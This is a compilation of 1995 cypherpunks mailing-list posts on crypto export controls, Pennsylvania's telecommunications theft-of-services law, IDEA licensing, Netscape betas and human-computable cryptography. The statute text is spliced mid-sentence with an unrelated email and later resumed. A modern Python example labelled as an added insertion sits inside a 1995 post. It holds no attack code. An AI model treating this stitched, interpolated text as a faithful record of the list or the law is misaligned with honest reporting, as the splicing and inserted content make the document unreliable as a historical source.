   apparatus, equipment or device.] unlawful telecommunication device; or
   
   
   (ii) material, including hardware, cables, tools, data, computer
   software or other information or equipment, knowing that the purchaser
   or a third person intends to use the material in the manufacture of an
   unlawful telecommunication device.
   
   (b) Grading. An offense under this section is a [misdemeanor of the
   first] felony of the third degree if the person convicted of such
   offense has been previously convicted of any similar crime in this or
   any other state or Federal jurisdiction. Otherwise it is a misdemeanor
   of the [second] first degree.
   
   (c) Restitution. The court may, in addition to any other sentence
   authorized by law, sentence a person convicted of violating this
   section to make restitution under section 1106 (relating to
   restitution for injuries to person or property) or 42 Pa.C.S.
   § 9721(c) (relating to sentencing generally).
   
   (d) Civil action. A telecommunication service provider aggrieved by a
   violation of this section may, in a civil action in any court of
   competent jurisdiction, obtain appropriate relief, including
   preliminary and other equitable or declaratory relief, compensatory
   and punitive damages, reasonable investigation expenses, costs of suit
   and attorney fees.
   
   (e) Definitions. As used in this section, the following words and
   phrases shall have the meanings given to them in this subsection:
   
   "Manufacture of an unlawful telecommunication device." To produce or
   assemble an unlawful telecommunication device or to modify, alter,
   program or reprogram a telecommunication device to be capable of
   acquiring or facilitating the acquisition of telecommunication service
   without the consent of the telecommunication service provider.
   
   "Telecommunication device." Any type of instrument, device, machine or
   equipment which is capable of transmitting or receiving telephonic,
   electronic or radio communications, or any part of such instrument,
   device, machine or equipment, or any computer circuit, computer chip,
   electronic mechanism or other component which is capable of
   facilitating the transmission or reception of telephonic, electronic
   or radio communications.
   
   "Telecommunication service." The meaning given to it in section 3926
   (relating to theft of services).
   
   "Telecommunication service provider." The meanings given to it in
   section 3926 (relating to theft of service).
   
   "Unlawful telecommunication device." The meaning given to it in
   section 3926 (relating to theft of service).
   
   § 3926. Theft of services.
   
   (a) Acquisition of services.
   
   (1) A person is guilty of theft if he intentionally obtains services
   for himself or for another which he knows are available only for
   compensation, by deception or threat, by altering or tampering with
   the public utility meter or measuring device by which such services
   are delivered or by causing or permitting such altering or tampering,
   by making or maintaining any unauthorized connection, whether
   physically, electrically or inductively, to a distribution or
   transmission line, by attaching or maintaining the attachment of any
   unauthorized device to any cable, wire or other component of an
   electric, telephone or cable television system or to a television
   receiving set connected to a cable television system, by making or
   maintaining any unauthorized modification or alteration to any device
   installed by a cable television system, or by false token or other
   trick or artifice to avoid payment for the service.
   
   (1.1) A person is guilty of theft if he intentionally obtains or
   attempts to obtain telecommunication service by the use of an unlawful
   telecommunication device or without the consent of the
   telecommunication service provider.
   
   [(2) As used in this section, the word "service" includes, but is not
   limited to, labor, professional service, transportation service, the
   supplying of hotel accommodations, restaurant services, entertainment,
   cable television service, the supplying of equipment for use, and the
   supplying of commodities of a public utility nature such as gas,
   electricity, steam and water, and telephone service. The term
   "unauthorized" means that payment of full compensation for service has
   been avoided, or has been sought to be avoided, without the consent of
   the supplier of the service.]
   
   (3) A person is not guilty of theft of cable television service under
   this section who subscribes to and receives service through an
   authorized connection of a

From owner-cypherpunks  Fri Oct 13 15:22:25 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA13987; Fri, 13 Oct 95 15:22:25 PDT
Received: from ix9.ix.netcom.com by toad.com id AA13971; Fri, 13 Oct 95 15:22:11 PDT
Received: from ix-pl4-18.ix.netcom.com by ix9.ix.netcom.com (8.6.12/SMI-4.1/Netcom)
	id PAA06683; Fri, 13 Oct 1995 15:21:53 -0700
Message-Id: <199510132221.PAA06683@ix9.ix.netcom.com>
X-Sender: stewarts@popd.ix.netcom.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 13 Oct 1995 15:21:00 -0700
To: zoetrope@infinet.com (cYberpUnc)
From: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: applications
Cc: cypherpunks@toad.com
Sender: owner-cypherpunks@toad.com
Precedence: bulk

At 05:50 PM 10/13/95 -0400, you wrote:
>        I know this isn't what you guys generally talk about but I was curious.
>Off the top of your head do you know of any sites where I can get kracking
>apps for macs?  Any information would be greatly appreciated.

There are several fine tool companies on the Web who can sell you large hammers.
Check with Yahoo for locations.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---


 the same person or several
   persons, may be aggregated in determining the grade of the offense.
   
   (d) Inferences.
   
   (1) Any person having possession of or access to the location of a
   public utility meter or service measuring device which has been
   avoided or tampered with so as to inhibit or prevent the accurate
   measurement of utility service and who enjoys the use of or receives
   the benefit from the public utility service intended to be metered or
   measured by the public utility meter or measuring device so avoided or
   tampered with may be reasonably inferred to have acted to avoid or
   tamper with the public utility meter or measuring device with the
   intent to obtain the public utility service without making full
   compensation therefor.
   
   (2) Any person having possession of or access to the location of the
   distribution or transmission lines or other facilities of a cable
   television system which have been tapped, altered or tampered with or
   to which any unauthorized connection has been made or to which any
   unauthorized device has been attached or any person having possession
   of or access to any device installed by a cable television system to
   which an unauthorized modification or alteration has been made, the
   result of which tapping, altering, tampering, connection, attachment
   or modification is to avoid payment for all or any part of the cable
   television service for which payment is normally required, and who
   enjoys the use of or receives the benefit from the cable television
   service, may be reasonably inferred to have acted to have tapped,
   altered, tampered with, connected or attached to or modified cable
   television facilities with the intent to obtain cable television
   service without making full compensation therefor. This inference
   shall not apply to the act of a subscriber to cable television
   service, who receives service through an authorized connection of a
   television receiving set at his dwelling, in making, within his
   dwelling, an unauthorized connection of an additional television
   receiving set or sets or audio system which receives only basic cable
   television service obtained through such authorized connection.
   
   (e) Sale or transfer of device or plan intended for acquisition or
   diversion. A person is guilty of a misdemeanor of the third degree if
   he sells, gives or otherwise transfers to others or offers, advertises
   or exposes for sale to others, any device, kit, plan or other
   instructional procedure for the making of such device or a printed
   circuit, under circumstances indicating his having knowledge or reason
   to believe that such device, kit, plan or instructional procedure is
   intended for use by such others for the acquisition or diversion of
   services as set forth in subsections (a) and (b).
   
   (f) Restitution. The court may, in addition to any other sentence
   authorized by law, sentence a person convicted of violating this
   section to make restitution under section 1106 (relating to
   restitution for injuries to person or property) or 42 Pa.C.S. 
   9721(c) (relating to sentencing generally).
   
   (g) Civil action. A telecommunication service provider aggrieved by a
   violation of this section may, in a civil action in any court of
   competent jurisdiction, obtain appropriate relief, including
   preliminary and other equitable or declaratory relief, compensatory
   and punitive damages, reasonable investigation expenses, costs of suit
   and attorney fees.
   
   (h) Definitions. As used in this section, the following words and
   phrases shall have the meanings given to them in this subsection:
   
   "Service." Includes, but is not limited to, labor, professional
   service, transportation service, the supplying of hotel
   accommodations, restaurant services, entertainment, cable television
   service, the supplying of equipment for use, and the supplying of
   commodities of a public utility nature such as gas, electricity, steam
   and water, and telephone or telecommunication service. The term
   "unauthorized" means that payment of full compensation for service has
   been avoided, or has been sought to be avoided, without the consent of
   the supplier of the service.
   
   "Telephone service" or "telecommunication service." Includes, but is
   not limited to, any service provided for a charge or compensation to
   facilitate the origination, transmission, emission or reception of
   signs, signals, data, writings, images and sounds or intelligence of
   any nature by telephone, including cellular telephones, wire, radio,
   electromagnetic, photoelectronic or photooptical system.
   
   "Telecommunication service provider." A person or entity providing
   telecommunication service, including, but not limited to, a cellular,
   paging or other wireless communications company or other person or
   entity which, for a fee, supplies the facility, cell site, mobile
   telephone switching office or other equipment or telecommunication
   service.
   
   "Unlawful telecommunication device." Any electronic serial number,
   mobile identification number, personal identification number or any
   telecommunication device that is capable, or has been altered,
   modified, programmed or reprogrammed alone or in conjunction with
   another access device or other equipment so as to be capable, of
   acquiring or facilitating the acquisition of a telecommunication
   service without the consent of the telecommunication service provider.
   The term includes, but is not limited to, phones altered to obtain
   service without the consent of the telecommunication service provider,
   tumbler phones, counterfeit or clone phones, tumbler microchips,
   counterfeit or clone microchips, scanning receivers of wireless
   telecommunication service of a telecommunication service provider and
   other instruments capable of disguising their identity or location or
   of gaining access to a communications system operated by a
   telecommunication service provider.
   
   Section 2. This act shall take effect in 60 days.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 18:19:27 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <aca45d8413021004e721@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 PM 10/13/95, Censored Girls Anonymous wrote:

>I mean maybe we could get Microhard to do a meeting.
>Or the dreaded RSA or somebody.

Jim Bidzos, President of RSADSI, attended our special "Clipper" meeting the
weekend after Clipper was announced, in April 1993.

I'm not saying this in defense of RSADSI and their patent situation, just
to note that they are not "dreaded."

No doubt Carol meant this tongue-in-cheek, but I think it important to
remind folks that things are not so black and white as to allow
demonization of such companies, at least not based on what has come out so
far.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 13 Oct 95 15:40:31 PDT
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: Exporting Mental States
In-Reply-To: <9510132031.AA10823@toad.com>
Message-ID: <Pine.3.89.9510131709.B15249-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Brad Shantz wrote:

> I just arrived in Ottawa, Canada from Seattle, USA.  I had sort of 
Welcome to Ottawa.

> Anyway, i got to customs in Ottawa, and they asked me if I had 
> anything to declare.  I immediately thought, "Should I tell them 
> about the notebook?"  I decided against it.  How does export of 
> intellectual property work?

Don't worry about it, Canada's not even a foreign country according to ITAR.
If you have pgp on that machine, you haven't exported it, but it's still 
covered by export controls.

We pretty much have exactly the same export restrictions on US origin 
software, but if it comes from anywhere else (including Canada of course)
it can be exported without a permit to all but four countries (Iran, Cuba
and two others) and cannot be exported at all to UN embargoed countries
(Bosnia, Iraq, Angola...). Since none of these have good net access, it's 
not much of a prob. The issue of whether ftp is an export hadn't resolved 
when I asked, and there might be a headache regarding US intellectual property 
and that US origin problem. 

So basically you can't export pgp, nautilus, rsaref..., but if they were 
rewritten from the ground up in Canada and put on the net, you *might* be 
ok. (that ignores the last issue, so ask Foreign Affairs and maybe a lawyer 
first, though I really can't see how a public domain idea can have a 
nationality)

ElGamal and IDEA would be completely without problems as they are not 
even American intellectual property.

Of course, I'm not a lawyer, and the gov has no obligation to agree with 
the advice of its own employees.

If you're interested I could mail you the address and phone no. of the export
controls division of external affairs. The policy officer was rather 
helpful. They also have a big booklet on export controls.

If you plan on going over, might as well ask about the American 
citizenship problem that's come up in the Anguilla thread. Sounds very funny.
(of course that would say nothing about the US State Dept's opinion on it)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Edwards <tedwards@access.digex.net>
Date: Fri, 13 Oct 95 15:42:48 PDT
To: cypherpunks@toad.com
Subject: Yes, indeed the PA law is for real!
Message-ID: <Pine.SUN.3.91.951013183116.11492A@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



Well folks, you can go view the new PA law yourselves at URL
http://moose.erie.net/~italo/rssb655.html

PA Senate Bill 655 was signed into law on June 13, 1995, and it does 
appear to make non-logged anonymous remailers illegal.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 13 Oct 95 18:06:32 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <199510131643.QAA05528@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>So no, this is not some great conspiracy on Sun's part to
>co-opt the list. You can return to your regularly scheduled
>paranoid fantasies. Thank you....

DAMN!.....I thought someone was on to something here.

I mean maybe we could get Microhard to do a meeting.
Or the dreaded RSA or somebody.

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Thu, 12 Oct 95 18:40:15 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: IDEA algorithm
Message-ID: <v02120d07aca4c6d130f2@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:38 PM 10/12/95, Adam Shostack wrote:
>| This may be an odd question, but who is it that owns the IDEA algorithm?
>|
>| We've had a number of requests regarding licensing RSAREF tying into
>| legitimizing PGP products. Part of that includes IDEA obviously.
>
>        Dr Peter Profos
>        Ascom-Tech AG, Solothurn Lab
>        Postfach 151
>        4502 Solothurn, Switzerland
>        v. +41 65 242 885
>        fax _41 65 235 761
>
>        Now go buy a copy of Applied Cryptography, which answers this
>and other questions you might have. :)

I know.. I blush. I've become such a netjunkie that not being able to find
any of the answers on web pages, or Cypherpunk logs I just panicked.

Thank you everyone who sent me a message with the reference.

I'd say more, but I have to run and get my fix in.

(Btw... what would be the absolute coolest thing folk would like to see
added to RSAREF? That is, other than code that we will need to negotiate
for. What new thing, speed upgrade, enhancement, etc would just tickle?)

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 13 Oct 95 15:55:14 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <307EB010.42C1@netscape.com>
Message-ID: <Pine.SUN.3.91.951013184249.18307C-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Jeff Weinstein wrote:

>   I'm not sure what you are getting at.  Are you saying that you've
> tried running Netscape's Java on SunOS and it doesn't work?  If that
> is the case, then it is a bug that will be fixed...

Uh, I must have been asleep and read your comment as Netscape 2.0 Java 
did not run on SunOs...Perhaps you can understand my confusion when it 
says at http://home.netscape.com/comprod/mirror/unix/ :
"The IRIX and Sun Solaris versions of Netscape Navigator 2.0b1 include 
Java support."  With no mention of SunOs.  But looking at the ftp sites, 
I do see the 20b1J for SunOs4.1.3.  Yey! 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 13 Oct 95 16:31:28 PDT
To: "L.Detweiler" <ldetweil@csn.net>
Subject: Re: CYPHERPUNKS EXPOSED
In-Reply-To: <199510131905.NAA00772@teal.csn.net>
Message-ID: <Pine.SUN.3.91.951013193016.761A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, L.Detweiler wrote:

> 
> Attn Reporters and Writers!! 
> 
> who are the CYPHERPUNKS?
> what are they talking about?
> what have they done in the past?
> who are the "leaders"?
> what do they believe in? 
> what are their *real* goals?
> 
> My name is L.Detweiler, and I've made a serious study of the more ulterior 
> aspects of the CYPHERPUNKS for several years, and I invite you to peruse my
> findings at the web site below.
> 
> I've been quoted in various articles and I'm available for serious interviews
> with anyone who wants the REAL STORY BEHIND THE CYPHERPUNKS.
> 
> note: be forewarned that key cypherpunks consider me a heretical 
> blasphemer because of the tenacious, unforgiving honesty and 
> zealous antisycophancy by which I have pursued this herculean study.
> 
> 
> |   /\  |\| /~ L~            ``I have to spew this stuff, or I'd be on the
> L_ /~~\ | | \_ L_             roof with a high power weapon.'' -Jim Carrey


Settlement Agreement.


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Fri, 13 Oct 95 18:20:53 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <199510140119.VAA08113@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510120147.LAA13833@sweeney.cs.monash.edu.au>,
Jiri Baum <jirib@sweeney.cs.monash.edu.au> wrote:
> What you are missing is that you should not say
>   "I want to send my credit card number to Egghead Software"
> you should say
>   "I want to send my credit card number to 12 34 56 78 9A BC DE F0"

Why does this sound so much like defining the problem away?

Maybe I just don't get it...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH8QCSoZzwIn1bdtAQFm1QGApigaZIVNZTghR9YrzwL/1dMCdu5zGMK5
QPCEJPY2W1hTrL/znVMkcOCg/Tw5ampO
=+2Co
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 13 Oct 95 18:22:04 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
Message-ID: <Pine.OSF.3.91.951013211406.21015A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


As a Canadian, I am often astounded by the attempts of the United States 
government to apply American law extraterritorially. A case in point is 
the trade embargo with Cuba. Canada does not recognize this embargo and 
trades freely with Cuba. Several American corporations faced legal 
sanction in the U.S. for the actions of their Canadian subsidiaries. I 
don't remember the details but can get references if anyone requires it.
ITAR regulations may be enforced by the U.S. government on the parent 
corporations if history is any judge.
In any case, these regulations are impeding standards development and the 
use of secure cryptography for commerce on the internet. As for key 
escrow and other schemes to dilute security, no foreign company is 
going to use such 'bastardized' products, knowing that the U.S. 
government may be listening in. Especially since your president is 
talking about commercial spying.
Regards, 

Tim Philp
Brantford, Ontario
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================



On Fri, 13 Oct 1995 s1018954@aix2.uottawa.ca wrote:

> 
> 
> On Fri, 13 Oct 1995, Michael Froomkin wrote:
> 
> > > If while you are outside the USA you want to write some software that uses
> > > encryption and sell it worldwide, let me know.  I could put you up while
> > > you wrote it and my company could sell it for share of the selling price. 
> > > Let me know what you are thinking of and how long you think it would take. 
> > 
> > Of course if you are a US person (citizen or green card holder) this is 
> > just as much a violation of the ITAR as if you did it from inside the US...
> 
> Really? I thought except for income taxes, US laws only apply in American
> territory as opposed to applying to American people wherever they are (as 
> I heard Germany's does).
> 
> What if you were a dual citizen (US/Canada in my case)?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Fri, 13 Oct 95 18:28:30 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape beta 2.0 [NOISE]
Message-ID: <199510140126.VAA08147@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510130224.TAA04729@infinity.c2.org>,
sameer <sameer@c2.org> wrote:
> 	Hey those shirts aren't measly!

Very comfy, in my opinion :-)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH8RzCoZzwIn1bdtAQGRTwGAzGuG7xyQyNmF7MZZpdU+1Wtx7tjmC1an
rnhYqyrNV/9XS3qLe789f8epr1/OsUE8
=cnDM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 13 Oct 95 21:28:35 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510132226.PAA13627@jobe.shell.portal.com>
Message-ID: <199510140427.VAA15400@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The Mad Scientist in the Middle writes via anonymous-remailer@shell.portal.com:

>The answer is doing cryptography in your head.  Well not quite, since many 
>cryptographic operations are very computing intensive, and not everyone can do 
>1000 bit mental modular exponentiation in a reasonable amount of time.  But if 
>you have a piece of secure hardware that you can trust to do some of these 
>operations for you, then all you need is a secure communications channel to 
>this piece of hardware.  

>There may be other ways, but I suggest that you establish a common key with 
>your crypto server ahead of time, and then simply encrypt all your 
>communications using a symmetric algorithm.  RC4 may be a reasonable choice, 
>since the operations are simple and easy to remember, but you need to keep 
>track of a 255-byte state.  WAKE is probably better.  Although it uses a large 
>key table, you only have to memorize it once, after which the only state that 
>is changing is four 32-bit registers.

I am not familiar with WAKE but I doubt that you could literally hold 128
bits in your head and manipulate them.

This is a problem which I have wondered about for some time.  Presumably
if we went to a digital cash world we would use smart cards to buy
things, but how do we make sure that nobody steals and uses our smart
cards?  Just typing in a PIN doesn't seem very safe to me, especially if
the card doesn't have a keypad built in and you're using a keypad in the
card reader as is often the case today.  Even with a pad on the card you
have to worry about eavesdroppers.

Biometric ID's (fingerprints, and Senator Feinstein's retina scans that
she wants to put on our national ID cards) have been proposed to solve
this but they are expensive and unreliable right now.  An information
based solution would be best if it were possible.

I have read one paper which attempts to solve this problem, called "Human
Identification through Insecure Channel".  Unfortunately my papers are in
a mess right now so I don't have the reference handy.  It was by some
Japanese researchers, published in one of the proceedings books.  I
believe a follow-on paper was published within the last year or two which
had some improvements or corrections to their algorithm.  Sorry to be so
vague, I'll try to dig out more info over the weekend.

Basically they used a challenge-response system which was intended to
be simple enough that people could do it in their heads.  The card
would display a random challenge string, some characters of which were
special to the user and others which he would ignore.  He would then
input a response string, where it didn't matter what corresponded to
the "ignore" slots, but in the special slots he had to produce certain
symbols corresponding to the other symbols, with the rules changing as
you move along.  The intention was that even by capturing and analyzing a
great many challenge-response pairs you couldn't create a response to a
challenge you hadn't seen before.

I coded this up, and frankly, I couldn't do the required manipulations in
my head, at least not without taking a very, very long time, and thinking
very carefully.  Maybe it would get easier with practice, I don't know.
But my overall feeling was that this would be at the limits of human
capability even for fairly bright people.  (OTOH I suppose learning to
read and write might seem pretty tough if you'd never done it.  Maybe
the 1st grade classes of the future will spend months training the kids
on how to use these kinds of algorithms.)

>I am sure better algorithms can be found for this purpose if mental 
>cryptography is made explicit as a design goal.  Perhaps it should be?

It's a hard problem to solve in general because you have only a human
mind to do the identification algorithm but you have computers to try to
break it.  But I would like to see the problem get more attention.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Fri, 13 Oct 95 19:40:12 PDT
To: cypherpunks@toad.com
Subject: Re: responce to graphic encryption replies
Message-ID: <9510140243.AA06608@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


> ... The graphic file is going to have a highly correlated 
> structure, long runs of white space etc. 

This is not the case for digital imagery. For any given band, if you
sample a significant portion of the image it would not be surprising to
see a more or less random distribution over the range.

> The statistics for such a file 
> would be different than the random distribution you'd get from using the 
> wrong key. 

If you decrypt with the wrong key, do you get a random distribution?
Would this be the case for all wrong keys? Would the statistics change
in any discernible pattern as the keys got "closer"?

> Even if the graphics format is compressed, leading to a more 
> even distribution, ...

This may give a better result. Most compressions involve a shift to the
frequency domain with a quantization of the samples. You might be able
to write a detector based on this discontinuity.

You could also try throwing an edge detector or some other morphological
recognizer at the output. It would still be cheaper than having a man
in the loop, but you're going to spend a lot of cpu time.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974
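
The questions raised in this exchange can be measured directly. The following is an added example, not code from any poster: the synthetic image, the SHA-256 counter-mode stand-in cipher, the keys and all function names are constructed assumptions. It compares a first-order statistic (byte entropy) with a second-order one (correlation between neighbouring samples) for output decrypted with the right key, a key one bit off, and an unrelated key.

```python
import hashlib
import math
from collections import Counter

WIDTH = HEIGHT = 256


def synthetic_image():
    """Constructed 8-bit test image: a diagonal gradient, row-major.
    Every grey level occurs equally often, so its histogram is flat."""
    return bytes((x + y) % 256 for y in range(HEIGHT) for x in range(WIDTH))


def keystream(key, n):
    """Stand-in stream cipher (assumption of this example): SHA-256 in
    counter mode. Not a vetted cipher; it only supplies noise-like output."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:n])


def xor_crypt(key, data):
    """Encrypt or decrypt by XOR with the keystream (same operation)."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def byte_entropy(data):
    """First-order statistic: Shannon entropy of the byte histogram, in bits."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def neighbour_correlation(data):
    """Second-order statistic: Pearson correlation of each sample with the next."""
    xs, ys = data[:-1], data[1:]
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(xs, ys))
    vx = sum((a - mx) ** 2 for a in xs)
    vy = sum((b - my) ** 2 for b in ys)
    return cov / math.sqrt(vx * vy)


def looks_like_image(data, threshold=0.5):
    """Detector: smooth imagery has strongly correlated neighbours."""
    return neighbour_correlation(data) > threshold


def experiment():
    """Decrypt one ciphertext with three keys and collect the statistics."""
    image = synthetic_image()
    key = bytes(range(16))                      # constructed key
    near_key = bytes([key[0] ^ 1]) + key[1:]    # differs from key in one bit
    far_key = bytes(reversed(key))              # unrelated key
    ciphertext = xor_crypt(key, image)
    results = {}
    for label, k in (("right", key), ("one-bit-off", near_key),
                     ("unrelated", far_key)):
        out = xor_crypt(k, ciphertext)
        results[label] = (byte_entropy(out),
                          neighbour_correlation(out),
                          looks_like_image(out))
    return results


if __name__ == "__main__":
    for label, (h, r, hit) in experiment().items():
        print("%-12s entropy=%.3f bits  corr=%+.3f  image=%s" % (label, h, r, hit))
```

In this constructed case the histogram of the real image is at least as flat as that of the wrong-key output, so entropy alone cannot separate them; the neighbour correlation does, and with this stand-in cipher a key that is one bit off gives output as noise-like as an unrelated key.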



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 13 Oct 95 23:16:23 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
In-Reply-To: <m0t3pvO-000K7RC@mail.infinet.com>
Message-ID: <307F54CF.573F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


zoetrope@infinet.com wrote:
>         Why would a company like Netscape jeopardise themselves by even
> letting out a beta version so
> hackers have time to find bugs before the full version is released. Don't
> take me wrong I have only been on the net fer a little over a year and Love
> Netscape.  And If I knew what I was Doing I would love to help them.....

  The reason we do it is that without wide exposure outside the
company, it is virtually impossible to get complete testing coverage.
Given the incredible variety of machines, OS's, peripherals, etc.
that are available in the real world, there is no way we could
re-create every possible configuration in the lab.

  We also can't visit every web page, or think of every combination
of features that clever people in the real world come up with every
day.  

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 06:59:45 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Insecurity Section of the Internet Handbook
In-Reply-To: <199510131209.NAA20556@utopia.hacktic.nl>
Message-ID: <199510131217.AA35639@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>URL: http://mls.saic.com/programs.html
>   
>                   SECURITY PROGRAMS

#define paranoia on

I wonder if some alert type has downloaded these and MD5 checked the tar.gz
files against known clean ones. Having SAIC hand you your security tools is
like having an NSA agent handing you a floppy with your brand new encryption
programs.

#define paranoia off

Mark
mark@lochard.com.au
The above opinions are rumoured to be my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 13 Oct 95 20:58:57 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.951013234946.9707B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 13 Oct 1995 s1018954@aix2.uottawa.ca wrote:

> Really? I thought except for income taxes, US laws only apply in American
> territory as opposed to applying to American people wherever they are (as 
> I heard Germany's does).

